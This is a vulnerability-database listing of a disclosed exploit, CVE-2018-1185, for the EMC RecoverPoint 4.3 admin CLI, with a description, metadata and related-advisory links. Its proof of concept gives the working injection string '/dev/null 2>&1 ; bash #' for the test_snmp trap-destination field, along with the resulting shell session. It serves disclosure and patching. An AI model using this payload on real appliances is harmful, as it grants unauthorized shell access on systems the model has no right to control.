Lucene search
Paul TaylorEXPLOITPACK:1D2423136AEAE5A34852EDCB8F5AF0D1HistoryMay 11, 2018 - 12:00 a.m.
EMC RecoverPoint 4.3 - Admin CLI Command Injection
2018-05-1100:00:00
Paul Taylor
24
EPSS
0.002
Percentile
54.1%
EMC RecoverPoint 4.3 - Admin CLI Command Injection
# Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection
# Version: RecoverPoint prior to 5.1.1 RecoverPoint for VMs prior to 5.0.1.3
# Date: 2018-05-11
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo
# Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1
# CVE: CVE-2018-1185
1. Description
An OS command injection vulnerability resulting in code execution as the built-in admin user.
A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.
2. Proof of Concept
RecoverPoint> test_snmp
Enter the trap destination (host name or IP)
> /dev/null 2>&1 ; bash #
admin@RecoverPoint:/home/kos/cli$ exit
exit
Test completed successfully.
RecoverPoint>
3. Solution:
Update to latest version of RecoverPointRelated
packetstorm
packetstorm
EMC RecoverPoint 4.3 Admin CLI Command Injection
2018-05-13 00:00:00
zdt
zdt
EMC RecoverPoint 4.3 - Admin CLI Command Injection Vulnerability
2018-05-12 00:00:00
cve
cve
CVE-2018-1185
2018-02-03 16:29:00
exploitdb
exploitdb
EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection
2018-05-11 00:00:00
nvd
nvd
CVE-2018-1185
2018-02-03 16:29:00
prion
prion
Command injection
2018-02-03 16:29:00
cvelist
cvelist
CVE-2018-1185
2018-02-03 01:00:00